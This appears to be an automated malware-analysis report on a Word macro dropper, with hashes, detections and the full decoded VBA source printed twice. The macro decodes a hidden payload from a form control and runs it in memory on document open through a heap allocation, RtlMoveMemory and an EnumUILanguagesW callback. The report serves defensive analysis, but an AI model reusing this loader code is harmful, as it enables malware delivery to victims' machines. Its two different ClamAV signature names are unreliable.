Office (OLE) malware analysis — malicious · 4267b8a5b5aed9cb

MALICIOUS

Office (OLE)

234.5 KB Created: 2016-10-06 14:50:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: d0de7475d786ec3aca6c293622bb8c99 SHA-1: d3820f5cabeaee7bc1e4616747ba2d5ef98a74c9 SHA-256: 4267b8a5b5aed9cbda63e3b4103253fef94f3bb1176a0e9c0042dff442bc026c

110 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6399847-0', indicating it functions as a dropper. The presence of a 'Document_Open' VBA macro strongly suggests that the macro executes automatically when the document is opened, a common technique for initiating malicious actions. The macro's obfuscated nature and the heuristic firings point towards it downloading and executing a secondary payload, aligning with the dropper classification.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6448136-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6448136-0

NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED

Long run of 0x4B bytes

Disassembly

Attempted x86 opcode disassembly

0000F0B0  4b                dec ebx
0000F0B1  4b                dec ebx
0000F0B2  4b                dec ebx
0000F0B3  4b                dec ebx
0000F0B4  4b                dec ebx
0000F0B5  4b                dec ebx
0000F0B6  4b                dec ebx
0000F0B7  4b                dec ebx
0000F0B8  4b                dec ebx
0000F0B9  4b                dec ebx
0000F0BA  4b                dec ebx
0000F0BB  4b                dec ebx
0000F0BC  4b                dec ebx
0000F0BD  4b                dec ebx
0000F0BE  4b                dec ebx
0000F0BF  4b                dec ebx
0000F0C0  4b                dec ebx
0000F0C1  4b                dec ebx
0000F0C2  4b                dec ebx
0000F0C3  4b                dec ebx
0000F0C4  4b                dec ebx
0000F0C5  4b                dec ebx
0000F0C6  4b                dec ebx
0000F0C7  4b                dec ebx
0000F0C8  4b                dec ebx
0000F0C9  4b                dec ebx
0000F0CA  4b                dec ebx
0000F0CB  4b                dec ebx
0000F0CC  4b                dec ebx
0000F0CD  4b                dec ebx
0000F0CE  4b                dec ebx
0000F0CF  4b                dec ebx
0000F0D0  4b                dec ebx
0000F0D1  4b                dec ebx
0000F0D2  4b                dec ebx
0000F0D3  4b                dec ebx
0000F0D4  4b                dec ebx
0000F0D5  4b                dec ebx
0000F0D6  4b                dec ebx
0000F0D7  4b                dec ebx
0000F0D8  4b                dec ebx
0000F0D9  4b                dec ebx
0000F0DA  4b                dec ebx
0000F0DB  4b                dec ebx
0000F0DC  4b                dec ebx
0000F0DD  4b                dec ebx
0000F0DE  4b                dec ebx
0000F0DF  654b              dec ebx
0000F0E1  4b                dec ebx
0000F0E2  4b                dec ebx
0000F0E3  4b                dec ebx
0000F0E4  4b                dec ebx
0000F0E5  386677            cmp byte ptr [esi + 0x77], ah
0000F0E8  65384b78          cmp byte ptr gs:[ebx + 0x78], cl
0000F0EC  4b                dec ebx
0000F0ED  5e                pop esi
0000F0EE  3e43              inc ebx
0000F0F0  6a65              push 0x65
0000F0F2  4a                dec edx
0000F0F3  58                pop eax
0000F0F4  3f                aas
0000F0F5  3c64              cmp al, 0x64
0000F0F7  56                push esi
0000F0F8  45                inc ebp
0000F0F9  647c69            jl 0xf165
0000F0FC  734a              jae 0xf148
0000F0FE  7569              jne 0xf169
0000F100  5f                pop edi
0000F101  335e69            xor ebx, dword ptr [esi + 0x69]
0000F104  5f                pop edi
0000F105  46                inc esi
0000F106  7843              js 0xf14b
0000F108  45                inc ebp
0000F109  3e646a5f          push 0x5f
0000F10D  37                aaa
0000F10E  7668              jbe 0xf178

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Dim assuasive As String
Private Sub Document_Open()
Dim needlessly As Byte
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://www.iec.chIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12535 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12535 bytes
SHA-256: `1fb9c784dd511b64ab85e6ddef706c7e682894c305cf70e5e4e4297b9ff34c5f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim extinguishment Dim richly As String Dim bracteal Dim footless As String Dim coriolanus Dim benefic Dim assuasive As String Private Sub Document_Open() Dim needlessly As Byte Dim chrysanthemum As String flugelhorn = "faburden" anticonvulsant highlevel = 98 majorca = 56 If highlevel + majorca < 17 Then highlevel = UCase$("ap") & LCase$("PAriTOR") footless = richly oiled = "cos" & Mid("dicynodontiamographynativity", 13, 8) Else extinguishment = benefic And 460 majorca = 43 End If End Sub Sub PrintAll() Dim aDoc As Document For Each aDoc In Documents aDoc.PrintOut Next End Sub Function manannan() Dim farmerette As Integer Dim ameer As Byte cetacean = 5 While cetacean < 9 hamamelidaceae = "inelegant" cetacean = cetacean + 1 footless = assuasive Wend ebionite = ThisDocument.Path manannan = ebionite & "/" & ThisDocument.Name End Function Function selfdisciplined(nefas, barmecide) Dim palaemonidae As Variant Dim rudderpost As Integer footless = "unparented" Dim apery As Integer Dim exalt As Long Dim ericales As String Dim windmill As Variant Dim uncomfortable As Long bowline exalt, ByVal VarPtr(barmecide) + 8, 4 coriolanus = coriolanus * 1 uncomfortable = nefas For modeling = 18 To 63 dictyopteran = 63 richly = "lounge" autosomal = UCase$("SL") & LCase$("eEPl") & UCase$("eSSly") autosomal = UCase$("Bo") & Right$("militantughten", 6) Next modeling bowline ByVal uncomfortable, ByVal exalt, 93 - 37 + 3243 footless = footless End Function Sub anticonvulsant() Dim circumvent As Byte Dim hest As Byte proclaim = cavia.counselorship.ControlTipText disenfranchisement = advance.bureaucratically(proclaim) rigueur = 56 avouchment = 81 If rigueur + avouchment < 16 Then rigueur = Right$("tuckedco", 2) & "mbou" & "t" richly = footless eukaryote = LCase$("Gr") & Left("adatimblandfordia", 6) Else footless = richly avouchment = 48 End If sexlinkage = "carpellary" hiroshima = "fricandeau" #If Win64 Then Dim auxilio As Variant Dim taskthankless As emery Dim coordinating As LongPtr taskthankless.header = 0 Dim merging As Variant #Else Dim myristicaceae As Integer taskthankless = 0 Dim moss As Byte Dim coordinating As Long #End If catspaw = 0 baltic = "she" nitrous = "df" tutorial = 4096 smutty = 11 While smutty < 16 brant = "fecklessness" smutty = smutty + 1 extinguishment = bracteal + 466 Wend nones = 38 + 87 - 112 + 262131 pelvic = quarterbacking(nones, taskthankless, taskthankless) coordinating = snuffs(pelvic, 0, 3299) plainsman = Left("nibunkmate", 2) & UCase$("Nos") moehringia = "vibrato" Dim lockmaster As String heartgrief = "riderless" brazen = "occupations" lockmaster = manannan For aerostation = 21 To 52 unrig = 52 footless = "anaplasia" hesperian = UCase$("Ha") & LCase$("rMs") hesperian = Left("jiprunella", 2) & Right$("banksiahad", 3) Next aerostation luminiferous = disenfranchisement bushed = "inbasket" acyclic = "equal" selfdisciplined coordinating, luminiferous alterative = "counterbore" #If Win64 Then Dim attorney As String orthography = "commensurability" godown = Mid("unasupiciousnaburdened", 13, 2) & Right$("skeweduru", 3) upstaged = "belly" marigraph = 117 - 127 + 22 + 564 #ElseIf (Win32) Then marigraph = 77 - 41 + 470 + 1698 #End If Dim akin As Byte Dim payphone As String Dim mesohippus As Long mesohippus = 0 Dim papilionoideae As Long papilionoideae = coordinating + marigraph anastrophe = mastoidectomy(papilionoideae, mesohippus, lockmaster) For fraction = 4 To 65 healthless = 65 bracteal = bracteal And 153 manorial = Left("ngmuridae", 2) & "wee" manorial = Right$("angioplastybu", 2) & Mid("cyatheaxomamateurishness", 8, 3) Next fraction End Sub Attribute VB_Name = "advance" 'It stings inside 'Numb me 'til I won't feel pain again #If Win64 Then 'Life has always been a problem 'It stings inside Public Type emery 'Can't you see? 'Life has always been a problem header As LongPtr 'I don't fit in 'I wish I could watch you drown and die End Type 'And take my time 'I don't fit in Public Declare PtrSafe Sub bowline Lib "ntdll" Alias "RtlMoveMemory" (cornishwoman As Any, coalman As Any, ByVal philander As LongPtr) 'I lost my mind 'I lost my mind Public Declare PtrSafe Function mastoidectomy Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal flags As Any, lParam As Any) As LongPtr 'Poisons me with time 'Life has always been a problem Public Declare PtrSafe Function angelfish Lib "user32" Alias "EndDialog" (ByVal auriform As LongPtr,nResult As LongPtr) As LongPtr 'And take my time 'I don't fit in Public Declare PtrSafe Function beam Lib "user32" Alias "GetDC" (ByVal apprehensiveness As LongPtr) As LongPtr 'Suffocate feelings you hide with lies 'I lost my mind Public Declare PtrSafe Function chickweed Lib "kernel32" Alias "RemoveDirectoryA" (asphodeline As LongPtr) 'It's like a needle in my spine 'I can't escape Public Declare PtrSafe Function quarterbacking Lib "kernel32" Alias "HeapCreate" (ByVal discourtesv As LongPtr,neuropsychiatric As emery, forehand As emery) As LongPtr 'I don't fit in 'Let it all go and in time you will find Public Declare PtrSafe Function meltable Lib "kernel32" Alias "TlsAlloc" () As LongPtr 'People have said 'It stings inside Public Declare PtrSafe Function snuffs Lib "kernel32" Alias "HeapAlloc" (ByVal rouser As LongPtr, ByVal creedal As LongPtr, ByVal americanize As LongPtr) As LongPtr 'Life has always been a problem 'Life has always been a problem Public Declare PtrSafe Function aeschylean Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr) 'Can't you see 'The pressure seems to get me down 'People have said 'I wish I could watch you drown and die #Else 'It stings inside 'And take my time Public Declare Function irreversibly Lib "kernel32" Alias "TlsAlloc" () As Long 'It's like a needle in my spine 'I can't deal with your lies Public Declare Function mastoidectomy Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal they As Any, lParam As Any) As Long 'I lost my mind 'I wish I could watch you drown and die Public Declare Function analects Lib "user32" Alias "EndDialog" (ByVal tellus As Long, coonciseness As Long) As Long 'Can't you see 'Fuck all the shit that you hold in your mind Public Declare Function quarterbacking Lib "kernel32" Alias "HeapCreate" (ByVal overexploitation As Long, ByVal caramel As Long, ByVal acequiador As Long) As Long 'Life is gone 'Life has always been a problem Public Declare Function churn Lib "user32" Alias "GetDC" (needful As Long) As Long 'I can't deal with your lies 'Numb me 'til I won't feel pain again Public Declare Function produce Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long) 'I wish I could watch you drown and die 'Can't you see Public Declare Sub bowline Lib "ntdll" Alias "RtlMoveMemory" (astronautic As Any, damages As Any, ByVal periploca As Long) 'I have no one 'I have no one Public Declare Function thalassemia Lib "kernel32" Alias "RemoveDirectoryA" (chapfallen As Long) 'It stings inside 'Nothing is real and dies in the lies Public Declare Function snuffs Lib "kernel32" Alias "HeapAlloc" (ByVal imperatively As Long, ByVal pellet As Long, ByVal cagoule As Long) As Long 'Can't you see? 'Let it all go and in time you will find 'The stress in life 'I am no one #End If 'Life has always been a problem 'I wish I could watch you drown and die Function bureaucratically(sightseeing) As String Dim animalism(63) As Long Dim arbitrament As Byte Dim mb As Long Dim matzo As Byte Dim cupule(255) As Byte Dim adore As Integer Dim bugged As String richly = richly Dim noumenon As Long Dim mantlet() As Byte Dim melodiously(63) As Long Dim compatibly As Integer Dim mayor As Long Dim bisulcated() As Byte Dim supineness(63) As Long assuasive = footless Dim cheapjack As Long mortar = 262144 Dim gentlefolk As Variant calorie = 70 + 65210 bloodstained = 16515072 bromoseltzer = 64 befouled = 16711680 abdominovesical = 4096 Dim botanic As Long Dim associate As String pleasingness = 48 + 208 pericranium = 63 clutches = 65536 apterygiformes = 50 + 26 + 99 + 257873 apogon = 125 - 47 - 28 + 3982 indefectible = 66 - 41 + 94 + 136 Dim endamage As Byte Dim atrocious() As Byte ReDim atrocious(4287) kinematicss = 125 - 28 + 4191 For i = 1 To kinematicss oldhat = Mid$(sightseeing, i, 1) nummi = (Asc(oldhat)) aquifer = "killifish" atrocious(i - 1) = nummi Next Dim sorites As Variant For multiplicative = 26 To 58 benison = 58 richly = richly decurved = UCase$("AsC") & LCase$("ripTI") & UCase$("oN") decurved = "ca" & Right$("dockagestan", 4) & Right$("witchgrasset", 2) Next multiplicative arkansan = UBound(atrocious) beati = 35 For biserrate = 0 To arkansan atrocious(biserrate) = atrocious(biserrate) + 2 Next biserrate prolapse = 10 While prolapse < 14 Start = "heartening" damaliscus = "nnumber" prolapse = prolapse + 1 assuasive = assuasive Wend adore = 0 mouche = 94 + 114 - 86 floppy = 26 + 99 + 130 For noumenon = 0 To floppy Select Case noumenon Case 65 To 90 cupule(noumenon) = noumenon - 65 Case 97 To mouche cupule(noumenon) = noumenon - 71 Case 48 To 57 cupule(noumenon) = noumenon + 4 Case 43 cupule(noumenon) = 62 Case 47 cupule(noumenon) = 63 End Select Next noumenon For noumenon = 0 To 63 melodiously(noumenon) = bug(noumenon, bromoseltzer) supineness(noumenon) = bug(noumenon, abdominovesical) animalism(noumenon) = bug(noumenon, mortar) Next noumenon dhawa = 5 While dhawa < 9 biceps = "cynomys" dhawa = dhawa + 1 assuasive = assuasive Wend mantlet = atrocious chionanthus = 79 - 75 ReDim bisulcated((((UBound(mantlet) + 1) \ chionanthus) * 3) - 1) carnation = 63 blabbermouthed = 100 If carnation + blabbermouthed < 25 Then carnation = Mid("retaliationthsavant", 12, 2) & Right$("nonreciprocatingeurg", 4) & Left("ypedodontist", 1) coriolanus = coriolanus And 77 abominate = UCase$("uN") & Left("reportedphallic", 8) Else assuasive = footless blabbermouthed = 85 End If apologetically = 3 assuasive = "cylindrical" extinguishment = benefic - 396 falcon = apologetically + 1 insistence = 2 For cheapjack = 0 To UBound(mantlet) Step falcon cagily = mantlet(cheapjack) mayor = animalism(cupule(cagily)) _ + supineness(cupule(mantlet(cheapjack + 1))) + melodiously(cupule(mantlet(cheapjack + 2))) + cupule(mantlet(cheapjack + apologetically)) noumenon = centigram(mayor, befouled) bisulcated(mb) = disapproving(noumenon, clutches) noumenon = centigram(mayor, calorie) bisulcated(mb + 1) = disapproving(noumenon, pleasingness) bisulcated(mb + insistence) = centigram(mayor, indefectible) mb = mb + insistence + 1 Next cheapjack bureaucratically = bisulcated End Function Function disapproving(grimfaced, cornaro) disapproving = grimfaced \ cornaro End Function Function bug(farthing, minuteness) bug = farthing * minuteness End Function Function centigram(logorrhea, deliquation) centigram = logorrhea And deliquation End Function Sub StandardInputBox() Dim strName As String 'InputBox(prompt[, title] [, default] [, xpos] [, ypos] [, helpfile, context]) strName = InputBox("Enter you name.", "NAME COLLECTOR") 'Exit sub if Cancel button used or no text entered If strName = vbNullString Then Exit Sub MsgBox "Hello " & strName End Sub Attribute VB_Name = "cavia" Attribute VB_Base = "0{2076C3FE-455B-4875-81A4-572CE93C0EDE}{B6DAAB8F-F905-4CC2-8AA4-D08FF13E68DB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "stayathome" Attribute VB_Base = "0{5C688934-CF2A-4B9F-900E-04BC1C6F90DD}{2EB0EEE2-E1FC-41C2-AB30-D8109ECE5099}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 1fb9c784dd511b64ab85e6ddef706c7e682894c305cf70e5e4e4297b9ff34c5f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim extinguishment
Dim richly As String
Dim bracteal
Dim footless As String
Dim coriolanus
Dim benefic
Dim assuasive As String
Private Sub Document_Open()
Dim needlessly As Byte
Dim chrysanthemum As String
flugelhorn = "faburden"
anticonvulsant
highlevel = 98
majorca = 56
If highlevel + majorca < 17 Then
highlevel = UCase$("ap") & LCase$("PAriTOR")
footless = richly
oiled = "cos" & Mid("dicynodontiamographynativity", 13, 8)
Else
extinguishment = benefic And 460
majorca = 43
End If
End Sub
Sub PrintAll()
   Dim aDoc As Document
   For Each aDoc In Documents
      aDoc.PrintOut
   Next
End Sub

Function manannan()
Dim farmerette As Integer
Dim ameer As Byte
cetacean = 5
While cetacean < 9
hamamelidaceae = "inelegant"
cetacean = cetacean + 1
footless = assuasive
Wend

ebionite = ThisDocument.Path
manannan = ebionite & "/" & ThisDocument.Name
End Function
Function selfdisciplined(nefas, barmecide)
Dim palaemonidae As Variant
Dim rudderpost As Integer
footless = "unparented"
Dim apery As Integer
Dim exalt As Long
Dim ericales As String
Dim windmill As Variant
Dim uncomfortable As Long
bowline exalt, ByVal VarPtr(barmecide) + 8, 4
coriolanus = coriolanus * 1
uncomfortable = nefas
For modeling = 18 To 63
dictyopteran = 63
richly = "lounge"
autosomal = UCase$("SL") & LCase$("eEPl") & UCase$("eSSly")
autosomal = UCase$("Bo") & Right$("militantughten", 6)
Next modeling

bowline ByVal uncomfortable, ByVal exalt, 93 - 37 + 3243
footless = footless
End Function
Sub anticonvulsant()
Dim circumvent As Byte
Dim hest As Byte
proclaim = cavia.counselorship.ControlTipText
disenfranchisement = advance.bureaucratically(proclaim)
rigueur = 56
avouchment = 81
If rigueur + avouchment < 16 Then
rigueur = Right$("tuckedco", 2) & "mbou" & "t"
richly = footless
eukaryote = LCase$("Gr") & Left("adatimblandfordia", 6)
Else
footless = richly
avouchment = 48
End If

sexlinkage = "carpellary"
hiroshima = "fricandeau"
#If Win64 Then
Dim auxilio As Variant
Dim taskthankless As emery
Dim coordinating As LongPtr
taskthankless.header = 0
Dim merging As Variant
#Else
Dim myristicaceae As Integer
taskthankless = 0
Dim moss As Byte
Dim coordinating As Long
#End If
catspaw = 0
baltic = "she"
nitrous = "df"
tutorial = 4096
smutty = 11
While smutty < 16
brant = "fecklessness"
smutty = smutty + 1
extinguishment = bracteal + 466
Wend

nones = 38 + 87 - 112 + 262131
pelvic = quarterbacking(nones, taskthankless, taskthankless)
coordinating = snuffs(pelvic, 0, 3299)
plainsman = Left("nibunkmate", 2) & UCase$("Nos")
moehringia = "vibrato"
Dim lockmaster As String
heartgrief = "riderless"
brazen = "occupations"
lockmaster = manannan
For aerostation = 21 To 52
unrig = 52
footless = "anaplasia"
hesperian = UCase$("Ha") & LCase$("rMs")
hesperian = Left("jiprunella", 2) & Right$("banksiahad", 3)
Next aerostation

luminiferous = disenfranchisement
bushed = "inbasket"
acyclic = "equal"
selfdisciplined coordinating, luminiferous
alterative = "counterbore"
#If Win64 Then
Dim attorney As String
orthography = "commensurability"
godown = Mid("unasupiciousnaburdened", 13, 2) & Right$("skeweduru", 3)
upstaged = "belly"
marigraph = 117 - 127 + 22 + 564
#ElseIf (Win32) Then
marigraph = 77 - 41 + 470 + 1698

#End If
Dim akin As Byte
Dim payphone As String
Dim mesohippus As Long
mesohippus = 0
Dim papilionoideae As Long
papilionoideae = coordinating + marigraph
anastrophe = mastoidectomy(papilionoideae, mesohippus, lockmaster)
For fraction = 4 To 65
healthless = 65
bracteal = bracteal And 153
manorial = Left("ngmuridae", 2) & "wee"
manorial = Right$("angioplastybu", 2) & Mid("cyatheaxomamateurishness", 8, 3)
Next fraction

End Sub


Attribute VB_Name = "advance"
'It stings inside
'Numb me 'til I won't feel pain again
#If Win64 Then
'Life has always been a problem
'It stings inside
Public Type emery
'Can't you see?
'Life has always been a problem
header As LongPtr
'I don't fit in
'I wish I could watch you drown and die
End Type
'And take my time
'I don't fit in
Public  Declare PtrSafe Sub bowline Lib "ntdll" Alias "RtlMoveMemory" (cornishwoman As Any, coalman As Any, ByVal philander As LongPtr)
'I lost my mind
'I lost my mind
Public  Declare PtrSafe Function mastoidectomy Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal flags As Any, lParam As Any) As LongPtr
'Poisons me with time
'Life has always been a problem
Public Declare PtrSafe Function angelfish Lib "user32" Alias "EndDialog" (ByVal auriform As LongPtr,nResult As LongPtr) As LongPtr
'And take my time
'I don't fit in
Public Declare PtrSafe Function beam Lib "user32" Alias "GetDC" (ByVal apprehensiveness As LongPtr) As LongPtr
'Suffocate feelings you hide with lies
'I lost my mind
Public Declare PtrSafe Function chickweed Lib "kernel32" Alias "RemoveDirectoryA" (asphodeline As LongPtr)
'It's like a needle in my spine
'I can't escape
Public  Declare PtrSafe Function quarterbacking Lib "kernel32" Alias "HeapCreate" (ByVal discourtesv As LongPtr,neuropsychiatric As emery, forehand As emery) As LongPtr
'I don't fit in
'Let it all go and in time you will find
Public Declare PtrSafe Function meltable Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'People have said
'It stings inside
Public  Declare PtrSafe Function snuffs Lib "kernel32" Alias "HeapAlloc" (ByVal rouser As LongPtr, ByVal creedal As  LongPtr, ByVal americanize As LongPtr) As LongPtr
'Life has always been a problem
'Life has always been a problem
Public Declare PtrSafe Function aeschylean Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'Can't you see
'The pressure seems to get me down

'People have said
'I wish I could watch you drown and die
#Else
'It stings inside
'And take my time
Public Declare Function irreversibly Lib "kernel32" Alias "TlsAlloc" () As Long
'It's like a needle in my spine
'I can't deal with your lies
Public Declare Function mastoidectomy Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal they As Any, lParam As Any) As Long
'I lost my mind
'I wish I could watch you drown and die
Public Declare Function analects Lib "user32" Alias "EndDialog" (ByVal tellus As Long, coonciseness As Long) As Long
'Can't you see
'Fuck all the shit that you hold in your mind
Public Declare Function quarterbacking Lib "kernel32" Alias "HeapCreate" (ByVal overexploitation As Long, ByVal caramel As Long, ByVal acequiador As Long) As Long
'Life is gone
'Life has always been a problem
Public Declare Function churn Lib "user32" Alias "GetDC" (needful As Long) As Long
'I can't deal with your lies
'Numb me 'til I won't feel pain again
Public Declare Function produce Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'I wish I could watch you drown and die
'Can't you see
Public Declare Sub bowline Lib "ntdll" Alias "RtlMoveMemory" (astronautic As Any, damages As Any, ByVal periploca As Long)
'I have no one
'I have no one
Public Declare Function thalassemia Lib "kernel32" Alias "RemoveDirectoryA" (chapfallen As Long)
'It stings inside
'Nothing is real and dies in the lies
Public Declare Function snuffs Lib "kernel32" Alias "HeapAlloc" (ByVal imperatively As Long, ByVal pellet As Long, ByVal cagoule As Long) As Long
'Can't you see?
'Let it all go and in time you will find

'The stress in life
'I am no one
#End If
'Life has always been a problem
'I wish I could watch you drown and die
Function bureaucratically(sightseeing) As String
Dim animalism(63) As Long
Dim arbitrament As Byte

Dim mb As Long
Dim matzo As Byte

Dim cupule(255) As Byte
Dim adore As Integer
Dim bugged As String
richly = richly

Dim noumenon As Long
Dim mantlet() As Byte
Dim melodiously(63) As Long
Dim compatibly As Integer

Dim mayor As Long
Dim bisulcated() As Byte
Dim supineness(63) As Long
assuasive = footless

Dim cheapjack As Long
mortar = 262144
Dim gentlefolk As Variant

calorie = 70 + 65210
bloodstained = 16515072
bromoseltzer = 64
befouled = 16711680
abdominovesical = 4096
Dim botanic As Long

Dim associate As String

pleasingness = 48 + 208
pericranium = 63
clutches = 65536
apterygiformes = 50 + 26 + 99 + 257873
apogon = 125 - 47 - 28 + 3982
indefectible = 66 - 41 + 94 + 136
Dim endamage As Byte
Dim atrocious() As Byte
ReDim atrocious(4287)
kinematicss = 125 - 28 + 4191
For i = 1 To kinematicss
oldhat = Mid$(sightseeing, i, 1)
nummi = (Asc(oldhat))
aquifer = "killifish"
atrocious(i - 1) = nummi
Next
Dim sorites As Variant
For multiplicative = 26 To 58
benison = 58
richly = richly
decurved = UCase$("AsC") & LCase$("ripTI") & UCase$("oN")
decurved = "ca" & Right$("dockagestan", 4) & Right$("witchgrasset", 2)
Next multiplicative

arkansan = UBound(atrocious)
beati = 35
For biserrate = 0 To arkansan
atrocious(biserrate) = atrocious(biserrate) + 2
Next biserrate
prolapse = 10
While prolapse < 14
Start = "heartening"
damaliscus = "nnumber"
prolapse = prolapse + 1
assuasive = assuasive
Wend

adore = 0
mouche = 94 + 114 - 86
floppy = 26 + 99 + 130
For noumenon = 0 To floppy
Select Case noumenon
Case 65 To 90
cupule(noumenon) = noumenon - 65
Case 97 To mouche
cupule(noumenon) = noumenon - 71
Case 48 To 57
cupule(noumenon) = noumenon + 4
Case 43
cupule(noumenon) = 62
Case 47
cupule(noumenon) = 63
End Select
Next noumenon
For noumenon = 0 To 63
melodiously(noumenon) = bug(noumenon, bromoseltzer)
supineness(noumenon) = bug(noumenon, abdominovesical)
animalism(noumenon) = bug(noumenon, mortar)
Next noumenon
dhawa = 5
While dhawa < 9
biceps = "cynomys"
dhawa = dhawa + 1
assuasive = assuasive
Wend

mantlet = atrocious
chionanthus = 79 - 75
ReDim bisulcated((((UBound(mantlet) + 1) \ chionanthus) * 3) - 1)
carnation = 63
blabbermouthed = 100
If carnation + blabbermouthed < 25 Then
carnation = Mid("retaliationthsavant", 12, 2) & Right$("nonreciprocatingeurg", 4) & Left("ypedodontist", 1)
coriolanus = coriolanus And 77
abominate = UCase$("uN") & Left("reportedphallic", 8)
Else
assuasive = footless
blabbermouthed = 85
End If

apologetically = 3
assuasive = "cylindrical"

extinguishment = benefic - 396

falcon = apologetically + 1
insistence = 2
For cheapjack = 0 To UBound(mantlet) Step falcon
cagily = mantlet(cheapjack)
mayor = animalism(cupule(cagily)) _
 + supineness(cupule(mantlet(cheapjack + 1))) + melodiously(cupule(mantlet(cheapjack + 2))) + cupule(mantlet(cheapjack + apologetically))
noumenon = centigram(mayor, befouled)
bisulcated(mb) = disapproving(noumenon, clutches)
noumenon = centigram(mayor, calorie)
bisulcated(mb + 1) = disapproving(noumenon, pleasingness)
bisulcated(mb + insistence) = centigram(mayor, indefectible)
mb = mb + insistence + 1
Next cheapjack
bureaucratically = bisulcated
End Function

Function disapproving(grimfaced, cornaro)
disapproving = grimfaced \ cornaro
End Function
Function bug(farthing, minuteness)
bug = farthing * minuteness
End Function
Function centigram(logorrhea, deliquation)
centigram = logorrhea And deliquation
End Function
Sub StandardInputBox()
Dim strName As String
    
    'InputBox(prompt[, title] [, default] [, xpos] [, ypos] [, helpfile, context])
    strName = InputBox("Enter you name.", "NAME COLLECTOR")
    'Exit sub if Cancel button used or no text entered
    If strName = vbNullString Then Exit Sub
    
    MsgBox "Hello " & strName

End Sub



Attribute VB_Name = "cavia"
Attribute VB_Base = "0{2076C3FE-455B-4875-81A4-572CE93C0EDE}{B6DAAB8F-F905-4CC2-8AA4-D08FF13E68DB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "stayathome"
Attribute VB_Base = "0{5C688934-CF2A-4B9F-900E-04BC1C6F90DD}{2EB0EEE2-E1FC-41C2-AB30-D8109ECE5099}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.